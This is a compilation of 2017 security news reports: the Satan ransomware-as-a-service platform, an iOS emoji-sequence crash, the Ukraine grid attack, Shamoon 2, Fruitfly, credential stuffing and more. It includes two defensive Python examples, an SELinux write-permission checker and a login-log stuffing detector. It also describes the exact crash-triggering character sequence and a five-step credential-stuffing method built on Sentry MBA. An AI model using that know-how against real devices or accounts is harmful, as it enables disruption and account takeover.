“The Satan platform has a user-friendly interface, it is really simple to use to create your own ransomware. Users just need to have a Bitcoin wallet to use for ransom payment. Wannabe criminals must specify the ransom amount in Bitcoin and furthermore they can decide to increase the amount of money to pay after a specific deadline.”

“Now, the most important part: the bitcoin paid by the victim will be credited to your account. We will keep a 30% fee of the income, so, if you specified a 1 BTC ransom, you will get 0.7 BTC and we will get 0.3 BTC. The fee will become lower depending on the number of infections and payments you have,” reads the advertisement for the Satan platform.

The Satan platform offers multiple services, including a dropper builder that can obfuscate the malware code to evade detection by virus scanners.


The RaaS also allows users to choose a language other than English or Portuguese. The platform also allows crooks to update their ransomware.


While encrypting, Satan changes the file extension to .stn; for example, myfile.txt becomes myfile.txt.stn.

Once the files are encrypted, Satan creates an HTML file (HELP_DECRYPT_FILES.html) on the desktop containing the ransom note and payment instructions.

Crooks encourage victims to pay the ransom to receive the private key needed to decrypt the files. Never pay any ransom or attempt to contact these cyber criminals, because there is no guarantee that your files will be decrypted!

Satan uses several evasion and anti-debugging techniques; for example, it does not run on a virtual machine, which makes it difficult to analyze.

In a couple of days, the crooks have already released two versions of the Satan platform.

Crashing iPhone Or iPad with a simple Emoji text message
20.1.2017 securityaffairs Apple

A text message containing a simple three-character Emoji sequence can freeze and reboot iPhones and iPads running iOS 10.1 or below.
A new Apple iOS bug discovered in the community of mobile tech experts can be exploited to crash iPhone or iPad devices just by sending an Emoji text message.

Several users are already reporting the issue, and the popular YouTube channel EverythingApplePro published a video proof-of-concept for the bug. The video shows an example of the character sequence that temporarily freezes an iPhone and causes the device to restart.

The sequence is composed of a white flag emoji, the digit “0” and a rainbow emoji. The issue is linked to the way iOS builds the rainbow flag emoji, which is not an official emoji: Apple creates it by combining the codes behind the white flag and rainbow emoji, joining them with a hidden character known as VS16. The iPhone attempts to combine the two emoji but is unable to because of the zero in the middle.

Emoji text message crash (image; source: http://www.magazine49.com/archives/48106)

There are also other ways to crash Apple mobile devices: another hack leverages the same characters inside a contact file that is sent to an iMessage contact via iCloud’s sharing feature.
“Both the methods mentioned above will crash an iPhone or iPad to varying degrees, although the simple text string sent via a standard iMessage appears to affect iPhones and iPads running iOS 10.1 or below,” reported The Hacker News. “However, the boobytrapped contact card affects all versions of iOS 10, including Apple’s latest iOS 10.2 operating system.”

Users have to upgrade to the latest iOS version in order to prevent this kind of attack.

Emoji text iPhone-freezing video

In November EverythingApplePro reported that most Apple devices crashed when their owners played a particular video. An iPhone-freezing video circulated online; when users played it in the Safari browser, their iPhones slowed down until they stopped working altogether.

The iPhone-freezing video, first discovered by EverythingApplePro, is a short .mp4 clip of someone standing by a bed with the word “Honey” written across the screen.

2016 Christmas Ukraine power outage was caused by hackers
20.1.2017 securityaffairs Hacking

Ukrenergo confirmed that the preliminary results of its investigation showed that the Ukraine power outage that occurred in December was caused by hackers.
In December 2016, the Ukrainian state energy company Ukrenergo suffered a severe power outage that affected the ”North” substation at Pivnichna. The incident caused blackouts in the city of Kiev and neighboring regions.

The head of NEC “Ukrenergo”, Vsevolod Kovalchuk, explained in a message posted on Facebook that experts at the company were able to restore power within 30 minutes using a manual procedure. According to Kovalchuk, operations were fully restored after just over an hour.

Kovalchuk pointed out that either an equipment malfunction or a cyber attack could be the cause of the problem. According to Kovalchuk, an “external interference through the data network” could have caused the power outage.


In a statement sent via email to SecurityWeek, Ukrenergo confirmed that the preliminary results of its investigation showed that the normal operation of workstations and SCADA systems had been disrupted due to “external influences.”

Once inside the target network, the attackers used malware to gain remote control of systems at the power plant. Experts are still investigating to establish a timeline of events and identify the hackers’ entry point. They do not exclude that the threat could still be inside the target network in a dormant state.

The company is working to secure its systems by implementing organizational and technological measures that would make them resilient to further attacks.

“The cyber-security company Information Systems Security Partners (ISSP) has linked the incident to a hack and blackout in 2015 that affected 225,000.” reported the BBC. “ISSP, a Ukrainian company investigating the incidents on behalf of Ukrenergo, now appears to be suggesting a firmer link.

It said that both the 2015 and 2016 attacks were connected, along with a series of hacks on other state institutions this December, including the national railway system, several government ministries and a national pension fund.

Oleksii Yasnskiy, head of ISSP labs, said: “The attacks in 2016 and 2015 were not much different – the only distinction was that the attacks of 2016 became more complex and were much better organised.“”

Who is behind the power outage?

Intelligence experts once again suspect Russia.

Shamoon 2 Variant Targets Virtualization Products

19.1.2017 Securityweek Virus
A second variant of the Shamoon 2 malware discovered by researchers at Palo Alto Networks has been set up to target virtualization products, likely in an effort to increase the impact of the attack and make recovery more difficult for targeted organizations.

Shamoon, aka Disttrack, is a disk-wiping malware that became widely known in 2012, when it damaged 35,000 computers belonging to Saudi Arabian petroleum and natural gas company Saudi Aramco. A newer version of the threat, dubbed Shamoon 2, was recently used to target various organizations in the Persian Gulf, including Saudi Arabia’s General Authority of Civil Aviation (GACA), which has downplayed the impact of the attack.

Palo Alto Networks has come across two variants of Shamoon 2. The first variant, detailed shortly after the new attacks came to light, was configured to automatically start wiping infected systems in the evening of November 17, 2016, just as the work week ended in Saudi Arabia.

The second variant discovered by the security firm had been configured to start wiping infected systems at 1:30 AM (Saudi Arabia time) on November 29, when the majority of the targeted organization’s employees were likely at home.

The payload delivered in this second wave was similar to the first one, but experts did find some differences. Same as in the first attacks, Shamoon spread throughout the local network using legitimate domain account credentials, including ones belonging to users and administrators. Since many of these passwords were complex, researchers believe the threat actor may have obtained the information as a result of a previous attack.

Palo Alto Networks also highlighted that the second Shamoon 2 variant included credentials for virtualization products from Huawei, specifically virtual desktop infrastructure (VDI) products such as FusionCloud.

These credentials can be found in the vendor’s official documentation, which suggests that the attackers either knew that the organization had been using these credentials based on information collected in a previous attack, or they were simply hoping that the defaults had not been changed.

“VDI solutions can provide some protection against a destructive malware like Disttrack through the ability to load snapshots of wiped systems. Also, since FusionCloud systems run a Linux operating system, which would not be susceptible to wiping by the Windows-only Disttrack malware, this could be seen as a reasonable countermeasure against attacks like Shamoon,” Palo Alto Networks’ Robert Falcone wrote in a blog post.

“However, if the attacker was able to log into the VDI management interfaces using the account credentials they could manually carry out destructive activities against the VDI deployment, as well as any snapshot,” Falcone added.

Security Bug Lurked in Nexus 9 Kernel for Two Years

19.1.2017 Securityweek Vulnerebility
A security vulnerability that allowed a privileged attacker to write arbitrary values within kernel space lurked in the Nexus 9 kernel for two years before being patched, IBM security researchers reveal.

Tracked as CVE-2016-3873, the vulnerability was found in the Tegra kernel branch and was assigned a high severity rating. It had plagued the Nexus 9 since the device’s release in November 2014, and was fixed in the 2016-09-05 security patch level after being discovered in June 2016.

In its September 2016 Security Bulletin, Google noted that this was an elevation of privilege vulnerability in the NVIDIA kernel and that a local malicious application could leverage it to execute arbitrary code within the context of the kernel. Because the bug first requires compromising a privileged process, it was assigned a High severity rating.

IBM X-Force Application Security Research Team’s Sagi Kedmi, the researcher who discovered the bug, explains that a similar issue (CVE-2016-2443) had been discovered by security researcher Marco Grassi in spring 2013. Found in the Qualcomm MDP driver, that bug was patched in Google’s May 2016 Android Security Bulletin.

“Kernel arbitrary write primitives can be used to achieve kernel code execution, which completely compromises the security of the device, not including TrustZone. It increases the TrustZone attack surface and allows attackers to access application data and override the Security-Enhanced Linux (SELinux) policy,” Kedmi explains.

The vulnerable code in Nexus 9 begins with the registers debugfs file node, which is initialized with a specific file operation where, on write system call, the cl_register_write() function securely copies a user space buffer and parses its contents as two numeric values, val and offs. Next, the cl_dvfs_writel() function is fed the two values, and __raw_writel() is used to write value val at offs+, which results in an arbitrary kernel write.

The researcher analyzed Discretionary Access Control (DAC) and Mandatory Access Control (MAC; SELinux on Android) to determine which active processes can trigger the vulnerability. DAC-wise, the attacker needs to execute code as root; MAC-wise, the researcher looked at which SELinux contexts are allowed to write to a file carrying the debugfs context.

Looking into the Nexus 9 sepolicy (MOB30M), Kedmi found that, SELinux-wise, all domains can open, write and append to any file with the debugfs context, and concluded that code execution within the zygote process, several system processes and some other processes can trigger and exploit the vulnerability.

“To exploit the vulnerability from an untrusted application security context, start by escalating privileges from an untrusted app to one of the contexts of the aforementioned processes. The commit that fixed the vulnerability indicates that Google simply removed the registers file from the debug file system. Clearly, the registers file node was not needed on production builds,” the researcher concludes.
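The policy question Kedmi answered by hand ("which domains may write debugfs files?") is the check a device maintainer wants to run on every production build, since a debugfs node that nothing may write cannot be reached even if a driver bug like this one remains. The script below is an added example, not IBM X-Force's or Google's tooling: it parses allow rules in sepolicy syntax with the usual permission macros already expanded, resolves attributes such as domain to their member types, and reports the domains with write or append on debugfs:file. Both policy fragments and the domain names in them are constructed; the permissive one mirrors the situation the article describes for MOB30M.

```python
import re

ALLOW_RE = re.compile(
    r"^allow\s+(?P<src>\S+)\s+(?P<tgt>\S+):(?P<cls>\S+)\s+(?P<perms>\{[^}]*\}|\S+)\s*;")
TYPE_RE = re.compile(r"^type\s+(?P<name>\w+)\s*(?:,\s*(?P<attrs>[\w\s,]+))?;")
TYPEATTR_RE = re.compile(r"^typeattribute\s+(?P<name>\w+)\s+(?P<attrs>[\w\s,]+);")


def parse_policy(text):
    """Return (attribute -> member types, list of allow rules)."""
    members = {}
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        m = TYPE_RE.match(line) or TYPEATTR_RE.match(line)
        if m:
            for attr in (a.strip() for a in (m.group("attrs") or "").split(",")):
                if attr:
                    members.setdefault(attr, set()).add(m.group("name"))
            continue
        m = ALLOW_RE.match(line)
        if m:
            perms = set(m.group("perms").strip("{}").split())
            rules.append((m.group("src"), m.group("tgt"), m.group("cls"), perms))
    return members, rules


def expand(name, members):
    """A rule source may be a type or an attribute; return the concrete types."""
    return set(members.get(name, {name}))


def domains_with_write(policy_text, target_type="debugfs", cls="file",
                       write_perms=("write", "append")):
    """Concrete domains allowed any of `write_perms` on target_type:cls."""
    members, rules = parse_policy(policy_text)
    domains = set()
    for src, tgt, rcls, perms in rules:
        if tgt == target_type and rcls == cls and perms & set(write_perms):
            domains |= expand(src, members)
    return domains


# Constructed policy: one rule on the catch-all "domain" attribute grants
# write to every process domain, which is what made the node reachable.
PERMISSIVE_POLICY = """
type untrusted_app, domain;
type system_server, domain;
type zygote, domain;
type debugfs, fs_type;
allow domain debugfs:file { open read getattr write append };
"""

# Constructed policy of the corrected shape: readable where needed, writable
# nowhere. (Google's actual fix removed the debugfs node itself.)
TIGHTENED_POLICY = """
type untrusted_app, domain;
type system_server, domain;
type zygote, domain;
type debugfs, fs_type;
allow domain debugfs:file { open read getattr };
allow system_server debugfs:dir search;
"""

if __name__ == "__main__":
    print("permissive, writable by:", sorted(domains_with_write(PERMISSIVE_POLICY)))
    print("tightened, writable by:", sorted(domains_with_write(TIGHTENED_POLICY)))
```

On a real device the input would be the output of a policy dump tool rather than hand-written rules, and an empty result for debugfs:file write is the condition to enforce in the build's policy tests.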

Critical Infrastructure Security: Risks Posed by IT Network Breaches

19.1.2017 Securityweek Security

There have been several incidents recently where a critical infrastructure organization’s IT systems were breached or became infected with malware. SecurityWeek has reached out to several ICS security experts to find out if these types of attacks are an indicator of a weak security posture, which could lead to control systems also getting hacked.

Security incidents involving critical infrastructure organizations

There are only a few publicly known examples of cyberattacks targeting an organization’s industrial control systems (ICS), including the recent Ukraine energy sector incidents and the 2010 Stuxnet attacks. However, there are several known incidents involving the IT networks of critical infrastructure organizations.

One recent report comes from Japan, where attackers last year stole the details (report in Japanese) of more than 10,000 employees of Taiyo Nippon, the country’s largest industrial gas producer and one of the world’s top gas suppliers. The breach, which took place in March 2016, did not affect any control systems, the company said.

In April, we learned that two widely used pieces of malware, namely Conficker and Ramnit, had been found on systems belonging to a German nuclear energy plant in Gundremmingen. Experts believe these systems were likely infected by accident rather than as a result of targeted attacks.

Also in April, the Board of Water and Light (BWL) in Lansing, Michigan, was hit by a piece of ransomware, but the organization said the malware only affected the corporate network, with no disruption to water or energy supplies.

The Grizzly Steppe report published recently by the U.S. government in an effort to help organizations detect attacks launched by Russia-linked threat actors has led to the discovery of suspicious traffic at two organizations: the Burlington Electric Department in Vermont, and the Hydro One electricity distributor in Canada. Both organizations said the electric grid was never at risk.

Experts comment on the risks posed by such incidents

SecurityWeek has reached out to several industrial cybersecurity companies to find out if more damaging attacks may be possible given the holes in these organizations’ security.

Robert M. Lee, CEO and founder of Dragos, Inc., believes poor security practices and poor network segmentation can lead to a number of control system issues.

“Often if the pathways into the IT side of the network are easily taken advantage of, you will find that pathways into the ICS are also easily taken advantage of; however this is not the case in every site and we have seen a significant increase in security by many organizations out there,” Lee said.

Lane Thames, software development engineer and security researcher at Tripwire, also believes that a weak security posture on the IT side can lead to breaches on the OT side, particularly in organizations that have started moving OT systems onto standard IT communication technologies (e.g. Ethernet, IP networking, Wi-Fi).

“For example, I have seen a single advanced manufacturing system with over 50 Ethernet ports, each one assigned its own IP address, that was controlled through a web based interface. If an attacker can penetrate the web server hosting the interface, then it is possible to penetrate the physical manufacturing device,” Thames said.

However, Lee and Thames agree that a security incident does not necessarily imply a poor security posture – even organizations with good security practices can get breached.

Opportunistic vs. targeted attacks

While critical infrastructure organizations may be breached by opportunistic threat actors who attack indiscriminately for financial gain, experts believe some of these incidents could be the reconnaissance phase of a targeted operation. They also point out that targeting ICS is not the same as targeting IT networks.

“The sophistication of some of the attacks on certain industrial facilities points to actors far more capable than your opportunistic hacker,” said Eddie Habibi, CEO of PAS. “If cybersecurity is going to be the new WMD (weapons of mass destruction) in the future, which we believe it has the proclivity to be, you have to also believe that every nation is right now trying to build both their offensive and defensive cyber capabilities. That includes reconnaissance, spyware, Trojan horse and more.”


Thames explained, “Reconnaissance is really always in the picture. Further, mainstream attacks are also always in the mix. However, on the industrial side you will also see attacks that are more tailored to the target industry with very specific objectives driving the attack. For example, manufacturing organizations will often be targeted with a goal of stealing sensitive information and intellectual property.”

Despite the differences, experts believe industrial networks are not necessarily more difficult to attack.

“Cyber attacks on industrial control networks are very different from attacks on IT networks because the infrastructures are inherently different. ICS networks contain specialized technologies that operate the different processes. Therefore reconnaissance is always an important phase in which the attacker carefully learns which technologies are in place and how they are operated,” explained Barak Perelman, CEO of Indegy. “This doesn’t make industrial networks more difficult to attack. On the contrary - it is quite easy to attack them.”

Lee has pointed out that the only targeted attacks covered by the mainstream media in 2016 were the ones aimed at Thyssenkrupp and Ukraine’s energy sector. However, the expert said there were a number of targeted threat incidents last year that were not made public.

Securing ICS systems vs. securing corporate networks

SecurityWeek has asked experts about the differences between an organization’s approach when securing their business network versus securing their OT network.

Stephen Ward, Claroty: “The OT domain was not purposely built with security in mind - it was built with reliability, safety and up-time at the core. It is a very complex environment that is sensitive to any potential disruption. When looking at security solutions for the OT domain, organizations have to ensure that no potential harm is introduced into the OT network - they're incredibly concerned with this and in the past this has resulted in IT security people introducing potential controls but OT network personnel disqualifying those approaches. OT security solutions need to be just that - purpose built with an understanding of the complexities of these networks. Passive security solutions - such as real-time monitoring and detection - are on the top of the list for OT security improvements as a result.”

Lane Thames, Tripwire: “Often, there are differences within the organizations themselves (at least that has been the case historically). OT focuses on “mission assurance” whereas IT focuses on “information assurance”. These two objectives are vastly different, and, based on my discussions with practitioners in the industry, it creates communication breakdowns and barriers when an organization with IT and OT approaches security operations. For example, a control engineer could care less about data loss whereas an IT system administrator could care less about air-gapping the battery backup units (UPSs).”

Eddie Habibi, PAS: “The difference is stark. Folks who are focused on protecting business networks concern themselves with protecting information. OT cybersecurity personnel are singularly focused on protecting the physical process plant and safety. These approaches lead to very different cybersecurity decisions. An OT system, for instance, may never have a patch applied if there is a perceived risk it will disrupt production. Instead, they will add security controls in front of that system to mitigate risk. A zero day vulnerability can become a forever day vulnerability. In an IT approach, the patch is applied in real-time. Policies are in fact in place to make sure patches are kept up to date.”

Robert Lee, Dragos: “There must be largely different approaches and processes for securing the OT networks than the IT networks. Simply put, these networks have more serious consequences that can occur from bad practices and they often cannot be secured in the same way. As an example, simply deploying antivirus to the ICS would not significantly contribute to security, and may actually detract from it, whereas that is a common practice in IT security. There need to be tailored methodologies, processes for authorization and ownership of problems, and a different view of the risk management.”

Barak Perelman, Indegy: “There is a huge difference in approaches. OT networks involve different technologies and have different security gaps that should be addressed. Even the network activity is different and uses different protocols. In addition, process stability, safety and continuity is a top priority in these environments. Therefore, any modifications that could impact operations are indefinitely postponed. This means that patches, upgrades and other changes are rarely made.

[...] Implementing network security in ICS environments poses unique challenges since it requires in-depth understanding of the intricacies of OT network activity.”

Credential Stuffing: a Successful and Growing Attack Methodology

19.1.2017 Securityweek Attack
With a database of 1 million stolen credentials, criminals using a credential stuffing attack with a tool such as Sentry MBA could expect to compromise roughly 10,000 accounts on a targeted but uncompromised site. In 2016, 3.3 billion user credentials were spilled onto the internet, according to figures from Shape Security's just released 2017 Credential Spill Report.

Credential theft occurs when attackers breach a system and steal users' access credentials -- usually ID and password. The ID is most commonly the user's email address. Credential spilling is when those credentials are made available to other criminals. Credential stuffing is the large scale use of automated means to test stolen passwords against other unrelated websites.

It is made possible because of the tendency for users to recycle their passwords for multiple accounts. This means that if criminals can crack stolen passwords from one account, they have legitimate credentials that have quite likely been used on other accounts.

Consider the two Yahoo breaches reported in 2016. A total of 1.5 billion credentials were spilled to the Internet, protected by the weak MD5 hashing algorithm. The thefts took place in 2012 and 2013, giving the criminals up to four years to crack weak protection. Occurrences like this mean that criminals have vast troves of legitimate user credentials -- and user password recycling means that many will have been used on other accounts. "The sheer scale of the credential theft and also the prevalence of Yahoo users' accounts suggests that these stolen credentials have been benefiting cybercriminals over the past few years," suggests the Shape report (PDF).

Simple brute force testing to discover where spilled passwords may have been reused is easily defeated. Web sites invariably have defenses that will detect repeated login attempts from the same IP address, or multiple failed attempts at the same account -- and simply block them.

Now consider credential stuffing. The term was coined by Shape Security co-founder Sumit Agarwal when he was serving as Deputy Assistant Secretary of Defense at the Pentagon. It is the combination of source credentials, an attack tool such as Sentry MBA, and a botnet delivery method. Sentry MBA cycles through the botnet to probe a target website with the spilled credentials. Since each IP within the botnet tries only one credential attempt at a time, there is nothing at the target end to suggest anything different to a normal user login attempt -- which either succeeds or fails. Even if an attack is suspected, Sentry MBA has moved on to the next botnet IP and blocking the suspect IP has no effect.
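The contrast the two paragraphs above draw, shown over a login log, as an added example that is not from the Shape report and not part of Sentry MBA. It builds a constructed auth log (the format, IPs and thresholds are assumptions), shows that the per-IP failure counter most sites already have catches the single-source brute force, and shows the aggregate signal that exposes a stuffing run in which every botnet IP makes exactly one attempt: a window where attempts come from almost entirely distinct IPs and almost all of them fail.

```python
"""Brute force vs. credential stuffing in a login log (added example, constructed data)."""
from __future__ import annotations
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass
class LoginEvent:
    ts: datetime
    ip: str
    user: str
    ok: bool


def constructed_log() -> str:
    """Synthetic log: normal traffic, one brute-force source, one stuffing run."""
    t0 = datetime(2017, 1, 18, 10, 0, tzinfo=timezone.utc)
    lines = []

    def emit(sec: int, ip: str, user: str, ok: bool) -> None:
        ts = (t0 + timedelta(seconds=sec)).strftime("%Y-%m-%dT%H:%M:%SZ")
        lines.append(f"{ts} ip={ip} user={user} result={'OK' if ok else 'FAIL'}")

    for i in range(10):                      # legitimate logins from ten office IPs
        emit(i * 5, f"192.0.2.{i + 1}", f"user{i}@example.com", True)
    emit(52, "192.0.2.3", "user2@example.com", False)     # one mistyped password
    for i in range(8):                       # brute force: one IP hammers one account
        emit(60 + i, "203.0.113.9", "ceo@example.com", False)
    for i in range(40):                      # stuffing: 40 proxies, one try each, 40 accounts,
        emit(120 + i, f"198.51.100.{i + 1}", f"victim{i}@example.net", i == 7)  # one reused password
    return "\n".join(lines)


def parse_log(text: str) -> list[LoginEvent]:
    """Parse 'ISO8601 ip=... user=... result=OK|FAIL' lines (the constructed format above)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, *pairs = line.split()
        f = dict(p.split("=", 1) for p in pairs)
        ts = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(LoginEvent(ts, f["ip"], f["user"], f["result"] == "OK"))
    return events


def per_ip_lockout(events: list[LoginEvent], max_failures: int = 5) -> set[str]:
    """The defence the text describes: block an IP after repeated failed logins."""
    failures = Counter(e.ip for e in events if not e.ok)
    return {ip for ip, n in failures.items() if n >= max_failures}


def stuffing_windows(events: list[LoginEvent], window: timedelta = timedelta(seconds=60),
                     min_attempts: int = 20, min_distinct_ip_ratio: float = 0.8,
                     min_fail_rate: float = 0.7) -> list[dict]:
    """Flag fixed time windows where attempts come from mostly distinct IPs and mostly fail.

    A stuffing run looks like this even though no single IP ever trips per_ip_lockout.
    Thresholds are assumptions; tune them against your own baseline traffic.
    """
    start = min(e.ts for e in events)
    buckets = {}
    for e in events:
        buckets.setdefault(int((e.ts - start) / window), []).append(e)
    flagged = []
    for idx, evs in sorted(buckets.items()):
        attempts = len(evs)
        distinct_ips = len({e.ip for e in evs})
        fail_rate = sum(1 for e in evs if not e.ok) / attempts
        if (attempts >= min_attempts and distinct_ips / attempts >= min_distinct_ip_ratio
                and fail_rate >= min_fail_rate):
            flagged.append({
                "window_start": start + idx * window,
                "attempts": attempts,
                "distinct_ips": distinct_ips,
                "distinct_users": len({e.user for e in evs}),
                "fail_rate": round(fail_rate, 3),
                # accounts the attacker got into: candidates for a forced password reset
                "successes": sorted(e.user for e in evs if e.ok),
            })
    return flagged


if __name__ == "__main__":
    evs = parse_log(constructed_log())
    print("per-IP lockout blocks:", per_ip_lockout(evs))
    for w in stuffing_windows(evs):
        print("stuffing window:", w)
```

On the constructed data the lockout catches only 203.0.113.9; none of the forty 198.51.100.x proxies ever reaches the failure threshold, while the 120-second window they hit is flagged with 40 attempts from 40 IPs against 40 accounts and a 97.5% failure rate. The one success in that window is the account whose password was reused, which is the list to act on.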

Sentry MBA provides various techniques to defeat other defenses -- such as built-in optical character recognition to solve CAPTCHA challenges.

Shape's figures suggest that the criminal return on credential stuffing can be anything between 0.1% and 2%. For every 1 million stolen credentials tried, that means somewhere between 1,000 and 20,000 accounts could be accessed because of password reuse; the 10,000 figure quoted above corresponds to a 1% success rate.

Credential stuffing is not an arcane attack method -- it is widely and increasingly used. For example, Shape reports, "In one week, cybercriminals made over five million login attempts at a Fortune 100 B2C website using multiple attack groups and hundreds of thousands of proxies located throughout the world." On another occasion, "During one day, a large retailer witnessed over 10,000 login attempts using over 1,000 proxies."

Nor are stolen credentials difficult to find. Some are simply dumped on the internet, given away free by hackers who hack for fun, or by others wishing to build a reputation. That reputation is necessary to gain access to, and do business on, some of the dark web credential marketplaces such as Cracking-dot-org, Crackingking-dot-org and Crackingseal-dot-io.

The result is an attack methodology that is easy and effective, and can be operated by any person with just the merest of technical skills. It involves just five steps: obtain the stolen credentials; choose a target; create an automation script to recognize whether the login attempt succeeds or fails; use a configurable credential stuffing tool such as Sentry MBA that can bypass controls such as WAF and CAPTCHA; takeover accounts and steal assets.

Shape Security is predicting that credential stuffing will become a major issue during 2017 as the 3.3 billion credentials spilled in 2016 (there may be more that we don't yet know about) work their way through the criminal system. The ultimate solution to the problem is simple: users must never reuse existing passwords. Ensuring that has so far been beyond both business and the security industry. In the meantime, business must seek other methods to protect against this growing threat.

Shape Security emerged from stealth mode in January 2014. One month later it announced that it had raised $40 million in a Series C funding round. In January 2016 it raised a further $25 million in a Series D funding round.

You Can Crash Anyone's iPhone Or iPad With A Simple Emoji Text Message
19.1.2017 thehackernews Apple

A newly discovered bug in Apple's iOS mobile operating system is being exploited in a prank that lets anyone crash your iPhone or iPad by just sending an emoji-filled iMessage, according to several reports.
YouTube star EverythingApplePro published a video highlighting a sequence of characters that temporarily freezes and restarts an iPhone, which people can send to their iPhone-owning friends to annoy them. You can watch the video demonstration below.
Here's the first troublesome text: a white flag emoji, the digit "0", and a rainbow emoji.

This sequence of a flag, a digit and a rainbow emoji confuses iOS 10: the device tries to combine the characters into a rainbow flag emoji and fails.
As soon as the text is received, the messaging app crashes, and the device restarts after a few minutes. The recipient does not even have to open or read the message.

Another iPhone-crashing method uses the same characters, but saved as a contact file and sent to an iMessage contact through iCloud's sharing feature.
This, too, crashes the target's device, even if the victim never opens the file.

Both methods crash an iPhone or iPad to varying degrees. The plain text string sent via a standard iMessage appears to affect devices running iOS 10.1 or earlier,
while the booby-trapped contact card affects all versions of iOS 10, including Apple's latest release, iOS 10.2.
Because both variants crash and reboot the device without any interaction from the recipient, there is nothing users can do to protect themselves.
So we hope that Apple releases a patch quickly to plug the issues; the company has declined to comment.
This is not the first time EverythingApplePro has shared iOS-crashing issues. The YouTuber has a long history of reporting on iPhone crash pranks.

Newly Discovered Mac Malware with Ancient Code Spying on Biotech Firms
19.1.2017 thehackernews

Security researchers have discovered a rare piece of Mac espionage malware that relies on outdated coding practices yet has been used in real-world attacks to spy on computers at biomedical research centers.
Dubbed Fruitfly, the malware has remained undetected for years on macOS systems despite using unsophisticated and "antiquated code."
Infosec firm Malwarebytes discovered Fruitfly, detected as 'OSX.Backdoor.Quimitchin,' after one of its IT administrators spotted some unusual outgoing activity from a particular Mac computer.

The researchers call it "the first Mac malware of 2017." It contains code that predates OS X and has reportedly been conducting detailed surveillance of targeted networks, possibly for over two years.
Fruitfly uses a hidden Perl script to communicate with two command-and-control (C&C) servers and can capture webcam images and screenshots (with code paths for both Mac and Linux), report the system's uptime, and move and click the mouse cursor.
Fruitfly can also collect information about other devices connected to the same network as the infected Mac, and then tries to connect to them, according to a blog post published by Malwarebytes.
The malware also uses a secondary script and Java class to hide its icon from showing in the macOS Dock, though it's still unclear how the malware got distributed and infected the machines.
What's more interesting is that the malware uses code that pre-dates Apple's OS X operating system, including the QuickTime Sequence Grabber calls SGGetChannelDeviceList, SGSetChannelDevice, SGSetChannelDeviceInput, and SGStartRecord.

The malware also bundles the open-source "libjpeg" library, in a version last updated in 1998, to read and write JPEG image files.
Digging further into the code, the researchers found the malware had been modified to "support" Mac OS X Yosemite, indicating that Fruitfly is at least two years old.
However, neither the old code nor the Yosemite change pins down the exact date the malware was created.
"The only reason I can think of that this malware has not been spotted before now is that it's being used in very tightly targeted attacks, limiting its exposure," Thomas Reed of Malwarebytes wrote in the post.
"There have been [many] stories over the past few years about Chinese and Russian hackers targeting and stealing the United States and European scientific research. Although there is no evidence at this point linking this malware to a specific group, the fact that it has been seen specifically at biomedical research institutions certainly seems like it could be the result of exactly that kind of espionage."
Fruitfly's code also includes Linux shell commands, which suggests it could run on Linux with little change, so a Linux variant would come as no surprise.
Reed also said he has come across related Windows executables that connect to the same C&C server used by Fruitfly and date back to at least 2013.
The good news is that Apple has released an update for macOS's built-in malware protection to address Fruitfly. Although Apple pushes the update automatically, Mac users should consider checking their systems for the infection, which Malwarebytes detects as OSX.Backdoor.Quimitchin.

XSS Found in Silently Installed Acrobat Chrome Extension

19.1.2017 Securityweek Vulnerability

Google Project Zero researcher Tavis Ormandy discovered that a Chrome extension installed silently by Adobe last week had been affected by a cross-site scripting (XSS) vulnerability. Adobe quickly patched the flaw after learning of its existence.

The updates released by Adobe on January 10 for Acrobat and Reader addressed 29 vulnerabilities. However, some users were displeased that the updates also automatically installed an Adobe Acrobat Chrome extension designed for converting web pages into PDF files.

The Windows-only extension requires permission to access data on the websites visited by the user, manage downloads, and communicate with cooperating native apps. The tool also collects some information from the system, but Adobe claims no personal information is involved and the “anonymous data will not be meaningful to anyone outside of Adobe.”

After analyzing the extension, which has roughly 30 million installs, Ormandy identified a DOM-based XSS vulnerability that allowed privileged JavaScript code execution. The expert classified the security hole as “critical severity.”

“I think CSP [Content Security Policy] might make it impossible to jump straight to script execution, but you can iframe non web_accessible_resources, and easily pivot that to code execution, or change privacy options via options.html, etc,” the Google researcher explained in an advisory.

The issue was reported to Adobe on January 12 and it was patched a few days later. It is not surprising that the vulnerability was fixed quickly considering that many of the flaws found in Adobe products are reported by Google Project Zero researchers or through the Chromium Vulnerability Rewards Program.

This was not the first time Ormandy identified a vulnerability in a Chrome extension. Roughly one year ago, the expert revealed that an extension automatically installed by AVG AntiVirus exposed users’ browsing history and other personal data.

Chrome Users Targeted in Malware Campaign

19.1.2017 Securityweek Virus

A recently observed malware distribution campaign has been specifically devised to target users of the Chrome browser on Windows-based computers, Proofpoint security researchers warn.

The campaign uses the infamous EITest infection chain, which has been previously associated with numerous exploit kit attacks leading to ransomware, information stealers, and other malware. First documented in 2014, EITest has seen numerous changes, and the switch to more targeted attacks instead of relying on exploit kits for infection is one of them.

The change in tactics was first noticed in December, when a compromised website was dropping a file named "Chrome_Font.exe" onto visitors' computers. The site, Proofpoint discovered, had been compromised by EITest, and it served the file only to visitors who passed a series of filtering checks.

The attack, security researchers found out, was targeting Chrome for Windows users specifically. As soon as the visitor was determined to use this browser, the code injected in the page would make text unreadable, and a fake alert was displayed, prompting the user to download and install a file supposedly containing new fonts.

“The infection is straightforward: if the victim meets the criteria - targeted country, correct User-Agent (Chrome on Windows) and proper referer - the script is inserted in the page and rewrites the compromised website on a potential victim's browser to make the page unreadable, creating a fake issue for the user to resolve,” Proofpoint researcher Kafeine explains.

The website, however, would attempt to infect Internet Explorer users as well. As long as they met specific criteria, they were exposed to a more “classic” exploit kit attack, the researcher notes.

The attack on Chrome users stored the text between HTML tags in an array and replaced it with "&#0". Because that numeric character reference does not decode to a valid character, the browser renders the Unicode replacement character � in its place, which makes the page look as if a font is missing.

A fake alert displayed in the browser then prompted users to install an updated font pack to view the page. The victim was told that a specific font ("HoeflerText," in Proofpoint's example) wasn't found and that they should install the update immediately. The fake alert can't be closed with the "x" button, and the malware is executed when the user approves the so-called update.

Proofpoint says the campaign was launched on December 10, 2016, and that the "Chrome_Font.exe" file users are tricked into installing is in fact the ad fraud malware known as Fleercivet.

